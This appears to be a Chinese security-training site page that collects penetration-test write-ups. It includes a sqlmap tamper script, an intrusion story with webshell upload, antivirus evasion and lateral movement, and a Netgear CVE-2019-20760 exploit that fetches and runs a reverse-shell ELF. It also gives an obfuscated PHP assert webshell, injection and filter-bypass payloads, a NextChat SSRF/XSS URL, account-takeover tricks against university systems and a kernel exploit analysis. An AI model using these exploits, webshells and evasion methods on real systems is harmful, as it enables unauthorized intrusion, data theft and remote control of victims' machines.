蚁景网安 - 网络安全人才培养服务提供商

在一次渗透中学会编写Tamper脚本

拿到这个网站，通过对比查询，我们发现闭合参数 finsh 时，查询出的内容更多经过进一步判断，确实存在漏洞不过在测试的时候发现存在一定的过滤但是可以通过内联注释进行绕过。这里也是加深了解了内联注释的知识点，之前只会简单的利用 /*!50000UniON SeLeCt*/ /*!12345union*/不知其所以然，有这样一段解释，在 mysql 中 /*!...*/不是注释，mysql 为了保持兼容，它把一些特有的仅在 mysql 上用的语句放在 /*!...*/中，这样这些语句如果在其他数据库中是不会被执行，但是在 mysql 中它会执行。当后面接的数据库版本号小于自身版本号，就会将注释中的内容执行，当后面接的数据库版本号大于等于自身版本号，就会当做注释来处理。如下语句 /*!50001UniON SeLeCt*/ 这里的 50001 表示假如数据库的版本是我们首先查询出数据库的版本信息当前面的数字为 50723 及小于这个数的五位数字组合都可以利用成功当前面的数字为 50724 及大于这个数的五位数字组合无法利用成功我们已经手工验证过了存在 SQL 注入漏洞，但是却无法利用 sqlmap 识别出联合注入，是因为存在检测，需要内联注释进行绕过我们需要编写一个Tamper脚本我们打开 sqlmap-master\tamper 下的一个文件 htmlencode.py 我们看到就是一个查找替换的操作我们目前已经知道需要利用内联注释来实现绕过检测的操作我们修改代码 import re from lib.core.enums import PRIORITY __priority__ = PRIORITY.LOW def dependencies(): pass def tamper(payload, **kwargs): """ HTML encode (using code points) all non-alphanumeric characters (e.g. ' -> ') >>> tamper("1' AND SLEEP(5)#") '1'/!*00000AND SLEEP(5)*/#' """ if payload: replaced_text = payload replace_code = re.search(r"'(.*?)(#|--)", payload) if replace_code: replaced_text = re.sub(r"(?<=')(.*?)(?=#|--)", r"/!*00000\1*/", payload) return replaced_text 成功生效

记一次有点抽象的渗透经历

0x01 获取webshell 在各种信息搜集中，发现某个ip的端口挂着一个比较老的服务。首先看到了员工工号和手机号的双重验证，也不知道账号是什么结构组成的，基本上放弃字典爆破这一条路。于是乎打开之前用灯塔的扫描结果，看看文件泄露是否有什么可用的点。发现其中有一个略显突出的help.html。可能是系统的帮助文档看得出来也是一个年久失修的系统了，图片的链接都已经404了。但是这里得到了一个示例账号zs001，也知道了初始密码是123456（吐槽：果然年久失修了，这个系统就没有输入密码的input，只有一个手机号验证码）。知道了账号，这里还缺一个手机号。感觉这个系统应该没做验证，毕竟看上去是一个老旧的系统，估计有没有人用用都不好说，可能是单位那种废弃了但是还没下架的边缘资产。然后随便输入一个手机号上去。果然！然后随便找个手机接码平台等待验证码发过来，然后过了十几分钟无果，想到可能是废弃资产的原因验证码接口早就失效了。于是没办法只能掏出burp开始爆破，估计验证码也是四位数，如果是六位数验证码大概率没系了。但是这波运气还算可以。也是成功爆破出来了。然后登录后台直接上传一个木马，没有任何过滤。emmmmmmm开始怀念过去。那时候的洞是真好挖啊。但是访问的时候出现了一个坏消息。404了，404了怎么办呢。想到了可能目标服务器上有杀软之类的东西。木马可能是上传到服务器上了，然后再上传到服务器之后被杀软自动隔离，那么这时候访问就会出现404。 0x02 webshell免杀这里中途又替换了几个github上的免杀木马，均无效。ps:我是懒狗，免杀什么的能不写代码就不写代码。php这玩意有个好处，就是语法特别脏，各种免杀手法层出不穷，花里胡哨。这里就简单的介绍几种比较偷懒的方法。 2.1 无字母webshell 个人在实际渗透过程中还算挺好用的，无字母webshell本来是ctf的一些题目，但是事实上免杀效果确实也挺强，而且适应性也比较高，适合一句话木马。之后可以直接上蚁剑链接。举例： ps：当然都说了偷懒，肯定不是我写的，直接去ctf平台的题目的writeup偷一个就好了。或者直接百度搜索无字母webshell。免杀效果如下： ps: emmmmmmm，我只能说，无敌好吧。 2.2 一键免杀工具免杀这里不多说了，去github直接找就是，但是github特征过于明显，以至于被多个杀软厂商标记。现在感觉免杀的效果也不太好了。基本上start高一些的工具生成的webshell都是秒杀。但是可以找一些start数量少的，效果也还不错。 2.3 混淆免杀混淆免杀，php有很多在线混淆的网站，也就是在不改变代码的功能情况下打乱语法的结构使得代码变为不可读或者可读性很差的代码防止其他人去修改。可以直接去网上搜索php混淆这里就是用的就是在线混淆php代码的方式直接过了目标主机上的杀软。 0x03 绕过杀软上线接下来就是传frp代理，上cs的操作了。这里先上一个cs，但是由于目标机器上有杀软，所以采用shellcode加加载器的方式去进行绕过。众所周知，cs的特征较为明显，很容易就会被杀软拦截。首先是shellcode免杀，shellcode免杀可以使用github上的sgn加密工具，免杀效果能达到vt0检测。github链接:https://github.com/EgeBalci/sgn 使用方法也很简单，把cs生成的shellcode放在sgn文件夹中执行 ,***.sgn就是免杀之后的shellcode了。 sgn.exe shellcode文件名免杀前效果免杀后效果剩下的就是加载器本身的免杀了，这里我就用github随便clone下来的加载器。可以看到编译完成都没来得及运行就直接被杀了。那么怎么在不动加载器的源代码的情况下。完成免杀效果呢。其实有一个比较抽象的技巧，就是当文件足够大之后，杀软的沙箱就不会去运行该程序，从而实现绕过杀软的检测。比如一个几百m的exe杀软就不会去检测。那么怎么能让文件变得足够大呢？就是不断往文件后面填充垃圾字符，比如\x00这样既不会影响exe执行，又能够让exe变得足够大。比如我用python不断往文件后面追加\x00字符。这里上代码 with open('1.exe', 'ab') as f:\f.write(b'\x00' * 1024 * 1024 * 100) 可以看到每次运行add.py 1.exe就大了100m。然后多次运行，当1.exe达到2g的时候，根据每个杀毒软件版本不一定能用。有些新的杀软不会检测文件大小判断是否运行。（这个方法很玄学，不是很稳定，有时候能有有时候不能用。但是还是值得一试，毕竟是老前辈传承下来的经典免杀手法。）但是问题来了，2个g的文件怎么上传到服务器又是一个问题，这里就要说明一下\x00的好处了，可以通过压缩成zip的方式把exe压缩，压缩文件的体积其实还是和之前编译好的文件差不多大。然后只能很方便的就能够把压缩包上传到服务器，然后通过服务器的命令去进行解压。也可以通过webshell去实现解压文件的功能。 0x04 内网移动之后便是熟悉的内网横向环节了。首先是看到了一个弱口令，然后直接链接数据库然后getshell。然后直接net user add，之后3389链接上服务器，翻出了一个密码本。找到一个双网卡的sql server服务器，然后上线，扫一波SMB 最后找到重要系统10.x.x.x 这个系统，看着是java写的后端,也是一个看起来很老的界面了。扫了一下路径发现存在druid。原本想找session登录的，然后想了一下试一下运气直接怼一波st2，成功拿下（也是运气爆棚）

Netgear无线路由器漏洞复现（CVE-2019-20760）

漏洞概述漏洞服务： uhttpd 漏洞类型：远程命令执行影响范围： 1.0.4.26之前的NETGEAR R9000设备会受到身份验证绕过的影响解决建议：更新版本漏洞复现操作环境： ubuntu:22.04 qemu-version： 8.1.1 仿真环境 wget https://www.downloads.netgear.com/files/GDC/R9000/R9000-V1.0.4.26.zip 下载固件。 binwalk -Mer R9000-V1.0.4.26.img 可通过 binwalk 常规解压获得文件系统。检查 ELF32 文件架构为 arm-32-little。 wget https://file.erlkonig.tech/debian-armhf/wheezy/debian_wheezy_armhf_standard.qcow2 wget https://file.erlkonig.tech/debian-armhf/wheezy/initrd.img-3.2.0-4-vexpress wget https://file.erlkonig.tech/debian-armhf/wheezy/vmlinuz-3.2.0-4-vexpress 下载合适的虚拟机映像。 #!/bin/sh # 参考《CTF实战》by ChaMd5 # 'ens33': The NIC is that can connect internet #sudo ifconfig eth0 down # 首先关闭宿主机网卡接口 sudo brctl addbr br0 # 添加一座名为 br0 的网桥 sudo brctl addif br0 ens33 # 在 br0 中添加一个接口 sudo brctl stp br0 off # 如果只有一个网桥，则关闭生成树协议 sudo brctl setfd br0 1 # 设置 br0 的转发延迟 sudo brctl sethello br0 1 # 设置 br0 的 hello 时间 sudo ifconfig br0 0.0.0.0 promisc up # 启用 br0 接口 sudo ifconfig ens33 0.0.0.0 promisc up # 启用网卡接口 sudo dhclient br0 # 从 dhcp 服务器获得 br0 的 IP 地址 sudo brctl show br0 # 查看虚拟网桥列表 sudo brctl showstp br0 # 查看 br0 的各接口信息 sudo tunctl -t tap0 -u root # 创建一个 tap0 接口，只允许 root 用户访问 sudo brctl addif br0 tap0 # 在虚拟网桥中增加一个 tap0 接口 sudo ifconfig tap0 0.0.0.0 promisc up # 启用 tap0 接口 sudo brctl showstp br0 配置网络。 #!/bin/sh qemu-system-arm \ -M vexpress-a9 \ -kernel vmlinuz-3.2.0-4-vexpress \ -initrd initrd.img-3.2.0-4-vexpress \ -drive if=sd,file=debian_wheezy_armhf_standard.qcow2 \ -append "root=/dev/mmcblk0p2 console=ttyAMA0" \ -net nic -net tap,ifname=tap0,script=no,downscript=no \ -nographic-M # 选择开发板• -m # 指定内存大小 -drive # 定义存储驱动器• file= # 定义镜像文件• -net nic # 创建客户机网卡• -net tap # 创建 tap 设备，以桥接方式跟宿主机通信• ifname=virtual0 # tap 设备与名为 virtual0 的虚拟网卡进行桥接通信• -nographic # 以非图形化模式启动• -append # 内核启动附加参数• -console=ttyAMA0 # console指向串口，有此启动参数，内核启动日志才能输出到宿主机终端 -nographic # 不再启用额外的终端界面启动 qemu-system-armhf 环境，默认用户名密码都为 root。 ifconfig eth0 192.168.152.168/24 为 qemu-system-armhf 配置静态 IP。 tar -cvf squashfs-root.tar.gz squashfs-root/ python3 -m http.server 将文件根系统打包，然后利用 python3 的 http.server 模块下载到 qemu-system-armhf 的根目录中并用 tar xvf squashfs-root.tar.gz 解压。 cd /squashfs-root mount --bind /proc proc # proc目录是一个虚拟文件系统，可以为linux用户空间和内核空间提供交互 mount --bind /dev dev # /dev/下的设备是通过创建设备节点生成的，用户通过此设备节点来访问内核里的驱动 chroot . sh 因为 chroot 会导致无法在隔离的文件系统中访问原本的 /proc和 /dev 目录，这里利用 mount 命令将 qemu-system-armhf 的 proc 和 dev 目录挂在到 squashfs-root 中，并更换根目录为 squashfs-root。 Web模拟 find -name uhttpd cat ./etc/init.d/uhttpd# ./etc/init.d/uhttpd ... start() { #config_load uhttpd #config_foreach start_instance uhttpd #mkdir /tmp/www #cp -rf /usr/www/* /tmp/www /www/cgi-bin/uhttpd.sh start inetd detplc #for bug58012 touch /tmp/fwcheck_status } ... 查找 uhttpd 的相关文件。 #!/bin/sh REALM=`/bin/cat /module_name | sed 's/\n//g'` UHTTPD_BIN="/usr/sbin/uhttpd" PX5G_BIN="/usr/sbin/px5g" uhttpd_stop() { kill -9 $(pidof uhttpd) } uhttpd_start() { $UHTTPD_BIN -h /www -r ${REALM} -x /cgi-bin -t 70 -p 0.0.0.0:80 -C /etc/uhttpd.crt -K /etc/uhttpd.key -s 0.0.0.0:443 } case "$1" in stop) uhttpd_stop ;; start) uhttpd_start ;; restart) uhttpd_stop uhttpd_start ;; *) logger -- "usage: $0 start|stop|restart" ;; esac 查看 start() 函数中利用的 /www/cgi-bin/uhttpd.sh 脚本。发现启动命令为 $UHTTPD_BIN -h /www -r ${REALM} -x /cgi-bin -t 70 -p 0.0.0.0:80 -C /etc/uhttpd.crt -K /etc/uhttpd.key -s 0.0.0.0:443 其中 REALM = R9000 ，UHTTPD_BIN = /usr/sbin/uhttpd。我们无需开启 https，所以启动命令为 /usr/sbin/uhttpd -h /www -r R9000 -x /cgi-bin -t 70 -p 0.0.0. 逆向分析 wget https://www.downloads.netgear.com/files/GDC/R9000/R9000-V1.0.4.28.zip 获取修复版本的固件。因为源码较为繁杂，我们通过 Bindiff 进行二进制比对，来查找漏洞点。 shift+D 选取修复版本的 /usr/sbin/uhttpd 文件即可，主要查看登录验证的 uh_cgi_auth_check() 函数。 memset(s, 0, 0x1000u); v14 = strlen(v13); uh_b64decode(s, 0xFFF, v13 + 6, v14 - 6); v15 = strchr(s, ':'); if ( !v15 ) { LABEL_32: v16 = 0; v17 = 0; goto LABEL_15; } v16 = v15 + 1; *v15 = 0; if ( v15 != (char *)0xFFFFFFFF ) { snprintf(command, 0x80u, "/usr/sbin/hash-data -e %s >/tmp/hash_result", v15 + 1); system(command); v3 = cat_file(73805); } v17 = s 漏洞版本 base64 解密后 snprintf() 后直接传给 system() 执行，这里会把 v15(:)后面的内容放到 %s 处，记得加\n来执行多条指令。 memset(s, 0, 0x1000u); v15 = strlen(v14); uh_b64decode(s, 4095, v14 + 6, v15 - 6); v16 = strchr(s, 58); if ( !v16 ) { LABEL_15: v17 = 0; v18 = 0; goto LABEL_16; } v17 = v16 + 1; *v16 = 0; if ( v16 != (char *)-1 ) { v18 = s; dni_system("/tmp/hash_result", 0, 0, "/usr/sbin/hash-data", "-e", v17, 0); v19 = cat_file("/tmp/hash_result"); goto LABEL_17; } 而修复版本则利用 dni_system() 执行，只可控参数。获取权限 poc: #!/usr/bin/python3 from pwn import * import requests import base64 cmd = 'admin:' cmd += '`' cmd += 'wget http://192.168.152.167:8000/shell.elf\n' cmd += 'chmod 777 ./shell.elf\n' cmd += './shell.elf\n' cmd += '`' assert(len(cmd) < 255) cmd_b64 = base64.b64encode(cmd.encode()).decode() headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Encoding": "gzip, deflate", "Connection": "keep-alive", "Upgrade-Insecure-Requests": "1", "Authorization": "Basic " + cmd_b64 } def attack(): try: requests.get("http://192.168.152.168/cgi-bin/", headers=headers, timeout=3) except Exception as e: print(e) attack()msfvenom -p linux/armle/shell_reverse_tcp LHOST=192.168.152.167 LPORT=10086 -f elf > shell.elf 利用 msf 生成对应架构的木马程序，然后在shell.elf所在的目录开启http服务，利用漏洞将木马程序下载下来。启动监听，并执行 exp.py 成功获取 shell，我们利用获取的权限在 www 目录创建 flag.txt 文件然后访问它。成功创建。

记一次特别的未授权访问

某个夜里，随手点进去的一个小程序，引发的连锁反应。开局一个小程序：登录方式令人发愁，尝试收集，无果。数据交互的地方说不定有sql，再次尝试，还是无果。复制连接去web端，看看有没有什么收获：好熟悉的界面，这不是SpringBoot框架不，立马工具梭哈。果然存在springboot未授权访问，网上查找了一些相应的资料，不同的路径泄露不同的信息。访问/actuator 发现存在heapdump，heapdump是一个二进制文件，里面存储大量敏感信息，立马访问下载，使用工具爬取敏感信息（JDumpSpider-master自动化爬取heapdump工具，特别好用）。成功找到redis密码，同样还有nacos密码。 Redis连接，无果，但是还有nacos，访问/ actuator/env，寻找地址。立即访问，还是无果。正当我准备放弃时，又发现一个地址而且是同ip下不同的端口，同样访问。第一次遇见也不知道是什么，弱口令爆破一波，无果。为什么我这么弱，不甘心，复制粘贴浏览器搜索，还真就给他搜出东西来了。再次尝试默认密码，无果，我最后的希望ssrf，拿下payload测试。好像有戏，但是我们登录不进去，看不到是否成功，于是想到了无回显的ssrf的利用，联动dnslog，看看是否有外联日志，说干就干，先到dnslog网址上申请一个ip，将127.0.0.1替换。来了来了，存在ssrf。（点到为止）结论：测试是一个艰辛又漫长的过程，抓住一切的可能才有结果。在任何情况下，未经授权的渗透测试行为都是违法的，可能导致严重的法律后果。因此，在进行任何安全测试之前，请务必与目标单位达成明确的协议和授权。

记一些CISP-PTE题目解析

0x01 命令执行直接payload: 127.0.0.1 &whoami，发现可以成功执行whoami命令然后ls ../ ，发现有个key.php文件尝试用cat命令查看发现不行被拦截了。（其实题目过滤了常用的查看文件的命令）这里有两种思路，第一种是根据题目意思用命令执行写webshell的方式去进行getshell，第二种方式则是使用linux的命令进行绕过。这里采用第二种方式使用c''at的方式进行绕过。 0x02 基础题目之文件上传突破可以发现部分上传代码，文件名被命名成一个随机数加上原本的文件名然后md5的值。直接上传一个带图片头的php木马（会检测是否是图片，所以需要一个GIF89A当图片头），而且过滤了一些敏感函数如eval等。这里直接上传一个免杀的木马即可。 <?php function go() { $func1 = chr(97) . chr(115) . chr(115) . chr(101) . chr(114) . chr(116); return $func1; } $func1 = go(); $array1 = array($_GET['cmd']); array_map($func1, $func1 = $array1); ?> 然后接下来就是爆破出shell的地址了，这里我们直接把上传的数据包重放1000次用来提高爆破成功的效率。用burp的null payload发送1000次然后设置上传的文件名1.php为前缀，加上随机数的1~99999，最后经过md5加密即可。设置前缀为1.php （上传的文件名）然后添加md5 最后就是等待爆破成功。 key在web根目录下的key.php文件 0x03 基础题目之流量分析下载数据包，使用wireshark发现是http协议居多，首先可以使用wireshark的导出文件查看一下http的访问文件分组。可以发现攻击者在进行目录爆破。这里可以直接选择然后根据文件大小排序一下，发现其中有一个压缩包。但是压缩包设置了密码然后查找http数据中是否有包含压缩包名字的数据包，其中phpspy.php包含了这个压缩包的名称。追踪流结果发现Adm1n!是解压密码（%21是url编码） 0x04 代码审计考点就是让数字绕过is_numerice判断，这里直接使用数字后面跟一个字符串即可绕过。 0x05 基础题目之SQL注入首先发现题目有一个注册界面，注册账号之后进行登录。然后再发表文章处发现存在insert注入。直接抓取数据包使用sqlmap即可 0x06 基础题目之SQL注入没什么特别的，只是过滤了union关键字这里用双写绕过就可以了， ununionion这样。然后直接load_file读取文件即可获取key。 0x07 无回显命令执行很简单，看了一下代码，限制了cmd参数的命令长度而已。可以使用linux的流符号生成一个文件 0x08 二阶SQL注入二次注入是一种SQL注入攻击的形式，它涉及到用户输入的数据在第一次被存储到数据库中时被错误地处理，导致在后续的查询中，这些原本被转义的数据再次被使用，从而执行恶意命令。第一步是插入恶意数据：在第一次插入数据时，开发者可能使用了函数如addslashes过滤了，这时是没有问题的。比如注册功能：这里注册一个test'用户，由于'被成功转义成了'所以这里是能够正常执行sql语句的。然后登录test'用户也是没有问题的但是问题出现再第二次数据库操作中，由于被存入的数据库的用户名是test'，那么在第二次系统从数据库中获取用户名的时候如果没有过滤那么就会造成二次注入。比如更新密码：系统的语句可能会长这样： update user set passwd = 'newpasswd' where uname = 'test'' #test'是用户名。那么这种情况就可能导致注入。那么二次注入怎么利用，这里可以看到需要admin用户登录才能够得到key，那么我们能够用构造一条语重置admin密码就可以了 update user set passwd = 'newpasswd' where uname = 'aaa' or 1 --a' aaa' or 1 -- a是用户名用新用户重置admin的密码再次登录admin

CVE复现之老洞新探（CVE-2021-3156）

ChatGPT-Next-Web漏洞利用分析（CVE-2023-49785）

1. 漏洞介绍日常网上冲浪，突然粗看以为是有关Chat-GPT的CVE披露出来了，但是仔细一看原来是ChatGPT-Next-Web的漏洞。漏洞描述大致如下：（如果有自己搭建了还没更新的速速修复升级防止被人利用，2.11.3已经出来了） NextChat，也称为 ChatGPT-Next-Web，是与 ChatGPT 一起使用的跨平台聊天用户界面。 2.11.2 及之前的版本容易受到服务器端请求伪造和跨站点脚本攻击的影响。2024年3月，互联网上披露CVE-2023-49785,攻击者可在无需登陆的情况下构造恶意请求造成SSRF，造成敏感信息泄漏等。 2. 漏洞分析定位到漏洞代码：app/api/cors/[...path]/route.ts：也就是大致如下内容： import { NextRequest, NextResponse } from "next/server"; async function handle( req: NextRequest, { params }: { params: { path: string[] } }, ) { if (req.method === "OPTIONS") { return NextResponse.json({ body: "OK" }, { status: 200 }); } const [protocol, ...subpath] = params.path; const targetUrl = `${protocol}://${subpath.join("/")}`; const method = req.headers.get("method") ?? undefined; const shouldNotHaveBody = ["get", "head"].includes( method?.toLowerCase() ?? "", ); const fetchOptions: RequestInit = { headers: { authorization: req.headers.get("authorization") ?? "", }, body: shouldNotHaveBody ? null : req.body, method, // @ts-ignore duplex: "half", }; const fetchResult = await fetch(targetUrl, fetchOptions); console.log("[Any Proxy]", targetUrl, { status: fetchResult.status, statusText: fetchResult.statusText, }); return fetchResult; } 在这段代码中，这里没有做任何的安全防护。params.path 是通过请求参数传入的，这意味着用户可以控制请求的路径部分。这个路径部分会被直接拼接到一个新的 URL 中，并在后续的代码中被用于发起请求，以绕过访问控制、访问内部系统或执行其他攻击。举个例子，当你访问 /api/cors/https/baidu.com 时，请求将被路由到这段代码中。在这里，protocol 将被设置为 https，subpath 将被设置为 ['baidu.com']。然后，这两部分将被拼接成 https://baidu.com，作为目标 URL。接下来，根据代码的逻辑，将会使用 fetch 发起一个对 https://baidu.com 的请求。这个请求的方法和请求体等信息将根据原始请求中的信息进行配置，然后将响应返回给客户端。我们验证一下，果然存在。至于披露着所说的反射型XSS，则完全是因为这里是用的fetch发包，fetch方法也支持 data 协议,且对后续的参数没有过滤限制导致的，所以我们通过参数拼接如下即可实现： /api/cors/data:text%2fhtml;base64,PHNjcmlwdD5hbGVydCgiQ1ZFLTIwMjMtNDk3ODUiKTwvc2NyaXB0Pg==%23 3. 总结没想到一个64.5k star 的项目之前居然对SSRF一点防护都没有做。 /api/cors 端点作为一个开放代理的设计，允许未经身份验证的用户通过它发送任意的 HTTP 请求。这个端点似乎是为了支持将客户端聊天数据保存到 WebDAV 服务器而添加的。我查看了最新的源代码：具体的官方修复思路如下：移除开放代理端点：最终修复方案中，移除了原始的开放代理端点/api/cors。替换为特定用途的端点：取而代之的是添加了两个新的端点/api/upstash和/api/webdav，这些端点具有特定的用途，分别用于与 Upstash 和 WebDAV 服务进行集成。这种替换的方式限制了端点的功能范围，并提供了更专门化的功能，有助于减少系统的安全风险。增加安全验证和限制： /api/upstash 限制目标URL：修复代码首先通过检查请求参数中的endpoint来限制目标URL。它要求目标URL必须是以.upstash.io结尾的有效URL，这样就限制了请求只能发送到特定的Upstash服务。限制请求方法：修复代码还对请求中的操作类型进行了限制。它只允许get和set两种操作类型的请求，如果请求的操作类型不是这两种之一，则会返回403 Forbidden响应。 /api/webdav 请求方法限制：修复代码只允许特定的HTTP请求方法，包括MKCOL、GET和PUT。对于其他不允许的请求方法，如POST等，会返回403 Forbidden响应。目标路径验证：修复代码对于不同的请求方法，会对目标路径进行不同的验证：对于MKCOL请求，只允许请求目标路径为指定的folder，如果请求的目标路径不是以指定的folder结尾，则返回403 Forbidden响应。对于GET请求，只允许请求目标路径为指定的fileName，如果请求的目标路径不是以指定的fileName结尾，则返回403 Forbidden响应。对于PUT请求，同样只允许请求目标路径为指定的fileName，如果请求的目标路径不是以指定的fileName结尾，则返回403 Forbidden响应。

Nftables漏洞原理分析（CVE-2022-32250）

记一次北京某大学逻辑漏洞挖掘

0x01 信息收集个人觉得教育src的漏洞挖掘就不需要找真实IP了，我们直接进入正题，收集某大学的子域名，可以用oneforall，这里给大家推荐一个在线查询子域名的网站：https://www.virustotal.com/ 收集到的子域名还是蛮多的，主要是子域名直接就可以复制到txt文件，方便后续域名探针。这里查询到700多个子域名。子域名探针，我用的是Finger，网上有相应文章介绍安装，不再赘述，直接拿去跑，探针存活的站点 0x02 资产漏洞挖掘我们需要对存活的站点进行查看，最严谨的做法是一一查看，找寻其中的漏洞，同时这样也最消磨我们这种小白的耐心，这里直接看Finger扫描输出文件里面的title，看是否带着 “系统”、“平台”、“登录”等字眼，这些站点是最好出漏洞的地方，因为他们往往存在登录框，可测的东西就多了。最终锁定两个系统站点 0x03 任意账号密码重置国际学生在线申请系统：https://***..edu.cn/user/login?configId=&sign= 有注册功能点就注册，没有就网上查询是否有默认密码进入，这里很幸运，有注册功能点，还不需要管理员审核，直接注册两个账号账号1：typ123/Typ123456. 账号2：hhh123/Hhh123456. 登录typ123这个账号，进入系统，查找功能点，发现修改密码处，不需要原密码，感觉有洞可挖，直接BP抓包 BP请求响应包部分代码如下： token=Mjg5NjQ3&newPassword=Typ654321.&confirmPassword=Typ654321. token值进行base64解码，结果为：289647 登录hhh123账号，记录它的token值，有看没有什么规律 token=Mjg5NjQ2&newPassword=Hhh654321.&confirmPassword=Hhh654321. 解码为：289646 对比发现token值是按注册顺序逐一增大的这里尝试将typ123的token值改为hhh123的，测试发现，成功修改hhh123账号的密码，一个逻辑漏洞到手 0x04 任意用户登录汉字全息资源应用系统：https://***.bnu.edu.cn/#/ 这里同样注册两个账号账号1：hhh123/hhh123456 账号2：typ123/typ123456 登录typ123账号，测试内部功能点，都测了一下，没有测出所以然，突然我想起之前看到的文章，抓登录请求返回包，说干就干，果然，有不一样的地方 {"code":200,"desc":"登陆成功！","result":"{\"token\":\"69565637941600f094864d0fcb4adbdd\",\"username\":\"typ123\",\"check\":\"0\",\"mail\":\"3215545898@qq.com\"}"} 这里我试着改一改参数，看登录有没有区别，试了一下，修改username值，就可以登录其他账号，直接将username值typ123改为hhh123 code":200,"desc":"登陆成功！","result":"{\"token\":\"69565637941600f094864d0fcb4adbdd\",\"username\":\"hhh123\",\"check\":\"0\",\"mail\":\"3215545898@qq.com\"}"} 成功，直接登录又一个逻辑漏洞到手 0x05 总结逻辑漏洞挖掘主打一个BP抓包，看请求包和请求返回包，分析包的代码，看有没有可以利用的参数，更改参数，不断尝试，去测试所有功能点,就会有意想不到的结果。

Netfilter漏洞提权利用（CVE-2023-35001）

前言 Netfilter是一个用于Linux操作系统的网络数据包过滤框架，它提供了一种灵活的方式来管理网络数据包的流动。Netfilter允许系统管理员和开发人员控制数据包在Linux内核中的处理方式，以实现网络安全、网络地址转换（Network Address Translation，NAT）、数据包过滤等功能。漏洞成因在netfilter中存在这nft_byteorder_eval函数，该函数的作用是将寄存器中的数据以主机序或网络序存储。具体代码如下，若采用的操作是NFT_BYTEORDER_NTOH则是将数据从主机序转化为网络序，而NFT_BYTEORDER_HTON则是从网络序转换为主机序。具体转换多少个字节则是用priv->size指定的，在该操作下可以转换二、四、八字节。该漏洞也是由于在对两字节数据进行大小端序转存时出现了错误所导致的。可以看到代码【1】中使用了联合体存储了源地址和目的地址，联合体的变量分别是u32与u16分别代表的是四字节与两字节的空间大小。然后在代码【2】与【3】处源地址是直接取出u16的变量存储到目的地址的u16变量中。乍一看似乎很符合常理，因为在处理双字节的时候，联合体中的变量就以u16存储，若处理四字节就转化为u32存储，但是这里存在个问题，在C语言中，联合体的存储空间是以最大空间为标准，换句话说无论联合体取出的变量是u16还是u32，联合体的大小都是占用四个字节的，而不会出现双字节的情况，因此在对s与d两个联合体进行遍历时，会以四字节为单位找到下一个位置。但是在计算长度时是以双字节进行计算的，因此就会导致拷贝时发生溢出。 File: linux-5.19\net\netfilter\nft_byteorder.c 26: void nft_byteorder_eval(const struct nft_expr *expr, 27: struct nft_regs *regs, 28: const struct nft_pktinfo *pkt) 29: { ... 33: 【1】union { u32 u32; u16 u16; } *s, *d; //使用联合体存储源地址与目的地址 ... 39: switch (priv->size) { ... 72: case 2: 73: switch (priv->op) { 74: case NFT_BYTEORDER_NTOH: 75: for (i = 0; i < priv->len / 2; i++) 76: 【2】d[i].u16 = ntohs((__force __be16)s[i].u16);//将源地址的数据拷贝到目的地址的低16位中 77: break; 78: case NFT_BYTEORDER_HTON: 79: for (i = 0; i < priv->len / 2; i++) 80: 【3】d[i].u16 = (__force __u16)htons(s[i].u16); 81: break; 82: } 83: break; 84: } 85: } 举个例子，我们自定义一个联合体数组dest，分别向下标0、1以及2进行赋值。 union {short a;long b;} dst[10]; int main() { dst[0].a = 0x1122; dst[1].a = 0x3344; dst[2].a = 0x5566; return 0; } 按照设想的情况，在使用双字节变量进行遍历的时候会以双字节为单位进行遍历，但是实际的情况如下图。可以发现即使每次赋值都是对双字节的变量进行赋值，但是再遍历的时候还是按照联合体中最大的存储空间（四字节）进行遍历的。因此漏洞的成因如下，因此在使用nft_byteorder函数转换双字节的大小端序时溢出。模块地址泄露在nft_byteorder_eval函数内部，溢出的地址是在寄存器下方。因此可以通过控制寄存器的下标值选择需要泄露的地址。在此需要观察通过nft_byteorder_eval函数可以溢出的范围，priv->len是可以人为控制的，只要满足reg * 4 + priv->len <= 0x50即可，reg代表寄存器的下标值，由于下标为0-4是属于状态值，因此不能通用，我们的reg的值需要从4开始计算起，那0x50 - 0x10 = 0x40就是我们priv->len能设置最大的值，(0x40 / 2) * 4 = 0x80，因此(0xaf8 ~ 0xaf8 + 0x80)范围内都是可以访问到的。但是现在存在一个问题，虽然我们可以越界访问，但是每次只能获取四字节中的低两个字节。 ... 75: for (i = 0; i < priv->len / 2; i++) 76: 【2】d[i].u16 = ntohs((__force __be16)s[i].u16);//将源地址的数据拷贝到目的地址的低16位中 ... 将下列值传参给nft_byteorder_eval函数 /* dst:18 src:8 priv->op:NFT_BYTEORDER_HTON priv->len:24 priv->size:2 */ rule_add_byteorder(r, 18, 8, NFT_BYTEORDER_HTON, 24, 2); 泄露的值如下，可以发现高两个字节的值是无法泄露的，因为在nft_byteorder_eval中，每次只拷贝了u16的变量。因此每次泄露只能获取低两字节的值。因此需要寻找其他方法进行地址的泄露。 nf_trace_fill_rule_info函数用于跟踪数据包，并且会将rule->handle的值放进数据包中回传给用户。想要正常执行nf_trace_fill_rule_info函数需要绕过条件 rule不能为空，并且rule->is_last需要为0，即当前rule不是最后一个 info->type不能是NFT_TRACETYPE_RETURN以及info->verdict->code不能NFT_CONTINUE /*函数递归 nft_do_chain -> nft_trace_packet -> __nft_trace_packet -> nft_trace_notify -> nf_trace_fill_rule_info */ File: linux-5.19\net\netfilter\nf_tables_trace.c 126: static int nf_trace_fill_rule_info(struct sk_buff *nlskb, 127: const struct nft_traceinfo *info) 128: { 129: if (!info->rule || info->rule->is_last) 130: return 0; 131: 132: /* a continue verdict with ->type == RETURN means that this is 133: * an implicit return (end of chain reached). 134: * 135: * Since no rule matched, the ->rule pointer is invalid. 136: */ 137: if (info->type == NFT_TRACETYPE_RETURN && 138: info->verdict->code == NFT_CONTINUE) 139: return 0; 140: 141: return nla_put_be64(nlskb, NFTA_TRACE_RULE_HANDLE, 142: cpu_to_be64(info->rule->handle), 143: NFTA_TRACE_PAD); 144: } 因此想要通过nf_trace_fill_rule_info函数获取数据的第一步是伪造rule。在regs变量的下方存在jumpstack变量结构体nft_jumpstack的构成如下，由chain、rule、last_rule组成，并且该结构体变量在regs下方，并且通过byteorder操作可以访问到jumpstack结构体，那么利用byteorder操作篡改rule。 struct nft_jumpstack { const struct nft_chain *chain; const struct nft_rule_dp *rule; const struct nft_rule_dp *last_rule; }; 接下来看一下nft_rule_dp结构体，可以发现is_last是调用nf_trace_fill_rule_info函数的条件，handle是泄露的值。 struct nft_rule_dp { u64 is_last:1, dlen:12, handle:42; 